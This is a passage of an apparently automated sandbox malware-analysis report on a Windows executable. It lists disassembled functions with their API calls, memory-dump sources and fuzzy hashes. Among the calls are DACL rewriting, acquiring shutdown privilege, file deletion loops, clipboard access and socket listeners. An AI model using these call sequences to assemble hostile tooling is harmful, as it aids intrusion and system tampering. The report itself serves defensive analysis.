                          Function 00B6ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B6ED0C
                          • GetFocus.USER32 ref: 00B6ED1C
                          • GetDlgCtrlID.USER32(00000000), ref: 00B6ED27
                          • _memset.LIBCMT ref: 00B6EE52
                          • GetMenuItemInfoW.USER32 ref: 00B6EE7D
                          • GetMenuItemCount.USER32(00000000), ref: 00B6EE9D
                          • GetMenuItemID.USER32(?,00000000), ref: 00B6EEB0
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B6EEE4
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B6EF2C
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B6EF64
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00B6EF99
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          • Opcode ID: 25dfa202e751577e3d32d705d13c32c0839920f25dffb9bfa3d52740eaac80cb
                          • Instruction ID: 3a458af7ada52ca8edbaad8f69973f59648097075a6d6e492dabaa980807c203
                          • Opcode Fuzzy Hash: 25dfa202e751577e3d32d705d13c32c0839920f25dffb9bfa3d52740eaac80cb
                          • Instruction Fuzzy Hash: 2781B275108311AFEB10DF14D884EABBBE4FF88354F1009AEF9A9972A1D735D905CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                            • Part of subcall function 00B3B8E7: GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                            • Part of subcall function 00B3B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                            • Part of subcall function 00B3B8E7: RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                            • Part of subcall function 00B3B982: GetProcessHeap.KERNEL32(00000008,00B3B3E1,00000000,00000000,?,00B3B3E1,?), ref: 00B3B98E
                            • Part of subcall function 00B3B982: RtlAllocateHeap.NTDLL(00000000,?,00B3B3E1), ref: 00B3B995
                            • Part of subcall function 00B3B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B3B3E1,?), ref: 00B3B9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3B3FC
                          • _memset.LIBCMT ref: 00B3B411
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3B430
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B441
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B3B47E
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B3B49A
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B4B7
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B3B4C6
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B3B4CD
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3B4EE
                          • CopySid.ADVAPI32(00000000), ref: 00B3B4F5
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B3B526
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B3B54C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B3B560
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: 9335a1e88334087b83a4e783630cf43613fae9e1646d3c555987710b08d0d6c0
                          • Instruction ID: ae56d707f68d12032c9bb048d7f1a2dda6549c30ed88baf95d0685fb7d477dbf
                          • Opcode Fuzzy Hash: 9335a1e88334087b83a4e783630cf43613fae9e1646d3c555987710b08d0d6c0
                          • Instruction Fuzzy Hash: D5511B71900209ABDF00DFA4DC55EEEBBB9FF04310F14815AEA15AB2A5DB35DA05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • _wcscat.LIBCMT ref: 00B46E7E
                          • __wsplitpath.LIBCMT ref: 00B46E99
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B46EAE
                          • _wcscpy.LIBCMT ref: 00B46EDD
                          • _wcscat.LIBCMT ref: 00B46EEF
                          • _wcscat.LIBCMT ref: 00B46F01
                          • DeleteFileW.KERNEL32(?), ref: 00B46F0E
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B46F22
                          • FindClose.KERNEL32(00000000), ref: 00B46F3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*
                          • API String ID: 2643075503-1173974218
                          • Opcode ID: 4f8ed45944122819694487551e02cad16442f3483452ebdd12487acb5baf346d
                          • Instruction ID: 27aa617d2ecd9acbce5df66015243bb95baf7a238cb5249e70ae00f6c96514cb
                          • Opcode Fuzzy Hash: 4f8ed45944122819694487551e02cad16442f3483452ebdd12487acb5baf346d
                          • Instruction Fuzzy Hash: A121C572409344AAC710EBA4D8849DB7BDC9F5A214F444D9AF5D4C3051EB30D74DC763
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B05D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                          • API String ID: 0-2893523900
                          • Opcode ID: 8017715ecdea8e8dc80014f0f04bb0858f4454a2eae3132ca8e5b5beac597b6a
                          • Instruction ID: f5aea0769f189343a33b6dbd7f0e30227a6d479c9500e9337d191e25108f9512
                          • Opcode Fuzzy Hash: 8017715ecdea8e8dc80014f0f04bb0858f4454a2eae3132ca8e5b5beac597b6a
                          • Instruction Fuzzy Hash: 96626071E002199BDF24DF59C8817AEBBF5FF48B10F1481AAE855EB291E7709E41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B57294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: b466aa6af21db7d4e211bb9a3907d51abc84009b8e9fd47ebb8cf4b872426fee
                          • Instruction ID: 5dda117a0b57ac0daa7106c48fb5ad0b38c2658a10a5cdbb22c47813ab1cff56
                          • Opcode Fuzzy Hash: b466aa6af21db7d4e211bb9a3907d51abc84009b8e9fd47ebb8cf4b872426fee
                          • Instruction Fuzzy Hash: E421BF31744210AFDB00AF64EC49B6D7BE8EF04321F00809AF94A9B2A1EF70ED41CB84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B524A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B524F6
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B52526
                          • _wcscmp.LIBCMT ref: 00B5253A
                          • _wcscmp.LIBCMT ref: 00B52555
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B525F3
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B52609
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                          • String ID: *.*
                          • API String ID: 713712311-438819550
                          • Opcode ID: a44c9df5020116d333964a839ef3b3d4d3da31eaf51bb8b73c9c0e214534cd8d
                          • Instruction ID: 05290f2f4e914967f1dcbd2d83d5c2224344ce0bbeceda8e3465341ef32d3a07
                          • Opcode Fuzzy Hash: a44c9df5020116d333964a839ef3b3d4d3da31eaf51bb8b73c9c0e214534cd8d
                          • Instruction Fuzzy Hash: BA416C7190121AAFCF15DFA4DC89AEEBBF4FF19311F1004D6E815A2190EB309A88CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B08530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: aad78000562135701d5b1bf6b5e6de7b387364c698c31a682c32f7be6b18e609
                          • Instruction ID: 4f0ec03af64da2c203720775d78674559419d23b93acd3976537b1da78f47179
                          • Opcode Fuzzy Hash: aad78000562135701d5b1bf6b5e6de7b387364c698c31a682c32f7be6b18e609
                          • Instruction Fuzzy Hash: 07129170A00609DFDF14DFA5D981AAEB7F5FF48300F2085A9E85AE7291EB359E10CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6FF91 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetSystemMetrics.USER32(0000000F), ref: 00B6FFCB
                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00B701EB
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B70209
                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B70234
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B7025D
                          • ShowWindow.USER32(00000003,00000000), ref: 00B7027F
                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00B7029E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                          • String ID:
                          • API String ID: 2922825909-0
                          • Opcode ID: b1db55af18af4d146cbe75760e8ef7775ece38f8f81423715071cb1a995a4d7b
                          • Instruction ID: d7777e31913157eabc7354a03d0973cd8b8f7d25caf998683f11898610b4f068
                          • Opcode Fuzzy Hash: b1db55af18af4d146cbe75760e8ef7775ece38f8f81423715071cb1a995a4d7b
                          • Instruction Fuzzy Hash: F0A18C3561061AEBDB18DF68C985BBDBBF1FB08700F04C196E868A7291DB34AD50CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B482D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                            • Part of subcall function 00B3BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                            • Part of subcall function 00B3BEC3: GetLastError.KERNEL32 ref: 00B3BF49
                          • ExitWindowsEx.USER32(?,00000000), ref: 00B4830C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          • Opcode ID: 3ed0f6cc1eccd4513434fc1d38f0dea9e8dff711357f363b95d98fcc749052ef
                          • Instruction ID: 2e3fcecc2094d442a9091b43c28fa5a7930cd697f9947d5ee0ce4571a8d53ee3
                          • Opcode Fuzzy Hash: 3ed0f6cc1eccd4513434fc1d38f0dea9e8dff711357f363b95d98fcc749052ef
                          • Instruction Fuzzy Hash: A601AC71744311ABE7691E788C8AFBF73D8DB04F80F1404A5F943D70D1DE509E00A1A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B591DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B59235
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59244
                          • bind.WS2_32(00000000,?,00000010), ref: 00B59260
                          • listen.WS2_32(00000000,00000005), ref: 00B5926F
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59289
                          • closesocket.WS2_32(00000000), ref: 00B5929D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          • Opcode ID: 7308a99927bd0af8189ab6f742154f86fa45a0f6af9182f6250ea3599eb593b2
                          • Instruction ID: 6ed225efd67f5d2dd445416de63d4b1ab3a0d85b2db8b6bf03282c3a737c29bd
                          • Opcode Fuzzy Hash: 7308a99927bd0af8189ab6f742154f86fa45a0f6af9182f6250ea3599eb593b2
                          • Instruction Fuzzy Hash: DA217A39600200EFCB10EF64C885B6EB7E9EF44725F148299E956AB2E1CB70AD45CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • _memmove.LIBCMT ref: 00B73020
                          • _memmove.LIBCMT ref: 00B73135
                          • _memmove.LIBCMT ref: 00B731DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID:
                          • API String ID: 1300846289-0
                          • Opcode ID: 9575a5c58af2faa28bcee47d2a42ff1362a1df1f813d16fdcbb3eb371a072abf
                          • Instruction ID: bbb65a6a80cadb65cf394702bdd15a6c99d79aa9c566fe70821d67e3ee7a5fb7
                          • Opcode Fuzzy Hash: 9575a5c58af2faa28bcee47d2a42ff1362a1df1f813d16fdcbb3eb371a072abf
                          • Instruction Fuzzy Hash: 03029070A00209DBCF04DF64D881AAEBBF5EF48300F54C4A9E81AEB295EB35DE55CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B596E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B5ACD3: inet_addr.WS2_32(00000000), ref: 00B5ACF5
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00B5973D
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00B59760
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: a0f7574caeb80d5db4a06265edb90dddfba00bbf82831c1e3c5930ae03bd6aaa
                          • Instruction ID: 2a145c3e6f7e7845e95276e665b2e1eae5a426df5e5cd395086ae036dd5ad036
                          • Opcode Fuzzy Hash: a0f7574caeb80d5db4a06265edb90dddfba00bbf82831c1e3c5930ae03bd6aaa
                          • Instruction Fuzzy Hash: 7641B474A00100AFDB10AF28CC82E6E77EDDF44724F548599F956AB3D2DB749E418B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4F37A
                          • _wcscmp.LIBCMT ref: 00B4F3AA
                          • _wcscmp.LIBCMT ref: 00B4F3BF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F3D0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B4F3FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          • Opcode ID: daf04da29afdc1c3640233404ae45a3ffe658ec8369ed41041f75ae5f883e65e
